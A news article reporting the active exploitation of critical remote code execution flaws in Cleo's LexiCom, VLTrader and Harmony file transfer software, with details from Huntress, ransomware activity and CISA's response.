Cleo File Transfer Software Targeted by Widespread Exploitation of Critical Vulnerability
Cleo, a leading provider of managed file transfer software, is currently grappling with reports of extensive exploitation of a significant vulnerability, even in fully patched systems. Users are being urged to ensure their installations are secured against potential internet exposure in light of this threat.
The cybersecurity firm Huntress identified this vulnerability on December 3, 2024, revealing that threat actors are actively exploiting it. The flaw, impacting Cleo’s LexiCom, VLTransfer, and Harmony software, involves unauthenticated remote code execution. It has been assigned the CVE identifier CVE-2024-50623, and classified with a critical CVSS score of 9.8. Cleo confirmed that the issue stems from an unrestricted file upload mechanism, which potentially allows for the execution of arbitrary code.
With a global customer base of over 4,200, Cleo has issued further advisories, including CVE-2024-55956, concerning another separate vulnerability that poses similar risks of remote code execution. Despite the availability of patches for the initial vulnerability, Huntress has cautioned that these solutions do not address the underlying issue completely. The impacted products include specific versions of Cleo Harmony, VLTrader, and LexiCom, which are expected to receive adequate patches imminently.
In recent exploit attempts analyzed by Huntress, multiple files were reportedly dropped, including an XML file configured to execute a PowerShell command that retrieves a Java Archive (JAR) file from a remote server. The attack mechanism exploits the software’s “autorun” directory, where files are read and executed upon detection.
At least ten organizations, covering sectors such as consumer products, logistics, and food supply, have experienced compromises of their Cleo servers. Increased activity was notably recorded on December 8, 2024. The pattern of exploitation and the specific targeting likely align with tactics outlined in the MITRE ATT&CK framework, particularly those associated with initial access, persistence, and privilege escalation.
Cybersecurity experts report that ransomware groups, including Termite, have deployed zero-day exploits against Cleo’s software. Their activities reflect a worrying trend wherein such groups have shifted focus toward managed file transfer solutions. Terms of exploitation tactics, such as conducting reconnaissance and executing remote commands, resonate with previous campaigns linked to groups like Cl0p.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2024-50623 to its Known Exploited Vulnerabilities catalog, notifying federal agencies to prioritize patching by January 3, 2025. Concurrently, CVE-2024-55956 has also been recognized due to its exploitation in ransomware attacks.
Cleo has publicly acknowledged these vulnerabilities and emphasized its commitment to addressing security concerns. The company has engaged external cybersecurity professionals and is providing enhanced customer support to those needing assistance. As the investigation progresses, organizations are advised to monitor Cleo’s security bulletin for ongoing updates. The situation underscores the critical need for businesses to regularly update their cybersecurity measures and remain vigilant against emerging threats in a rapidly evolving digital landscape.
